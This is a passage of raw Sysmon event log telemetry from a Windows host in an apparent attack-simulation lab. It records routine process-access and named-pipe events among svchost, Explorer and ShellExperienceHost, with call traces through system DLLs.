:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007405Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:32.801{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007404Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.801{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007403Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:32.801{266CAFBE-647D-6064-3300-00000000AE01}25204828C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\tileobjserver.dll+bce2|c:\windows\system32\tileobjserver.dll+26da2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000007402Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:32.801{266CAFBE-647D-6064-3300-00000000AE01}25204828C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\tileobjserver.dll+bc8f|c:\windows\system32\tileobjserver.dll+26da2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 18141800x80000000000000007401Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-ConnectPipe2021-03-31 12:02:32.801{266CAFBE-64C5-6064-A500-00000000AE01}4356\TDLN-4356-41C:\Windows\Explorer.EXE 17141700x80000000000000007400Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:02:32.801{266CAFBE-647D-6064-3300-00000000AE01}2520\TDLN-4356-41C:\Windows\system32\svchost.exe 10341000x80000000000000007399Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:32.801{266CAFBE-647D-6064-3300-00000000AE01}25204828C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\tileobjserver.dll+bce2|c:\windows\system32\tileobjserver.dll+26f12|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000007398Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:32.801{266CAFBE-647D-6064-3300-00000000AE01}25204828C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\tileobjserver.dll+bc8f|c:\windows\system32\tileobjserver.dll+26f12|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x80000000000000007397Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:32.801{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007396Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.801{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007395Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:32.785{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007394Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.785{266CAFBE-64C5-6064-A500-00000000AE01}43565852C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\wpncore.dll+38f2d|C:\Windows\System32\wpncore.dll+37bbe|C:\Windows\System32\wpncore.dll+232a3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\W
indows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 10341000x80000000000000007393Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.785{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007392Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:32.785{266CAFBE-64C5-6064-A500-00000000AE01}43565852C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\wpncore.dll+38f2d|C:\Windows\System32\wpncore.dll+38e70|C:\Windows\System32\wpncore.dll+23267|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 10341000x80000000000000007391Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:32.785{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007390Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.785{266CAFBE-64C5-6064-A500-00000000AE01}43565852C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\wpncore.dll+38f2d|C:\Windows\System32\wpncore.dll+37bbe|C:\Windows\System32\wpncore.dll+232a3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\W
indows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 10341000x80000000000000007389Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.785{266CAFBE-64C5-6064-A500-00000000AE01}43565852C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\wpncore.dll+38f2d|C:\Windows\System32\wpncore.dll+38e70|C:\Windows\System32\wpncore.dll+23267|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 10341000x80000000000000007388Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:32.785{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007387Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.785{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007386Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:32.785{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007385Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.785{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007384Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:32.785{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007383Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.754{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007382Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:32.739{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007381Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 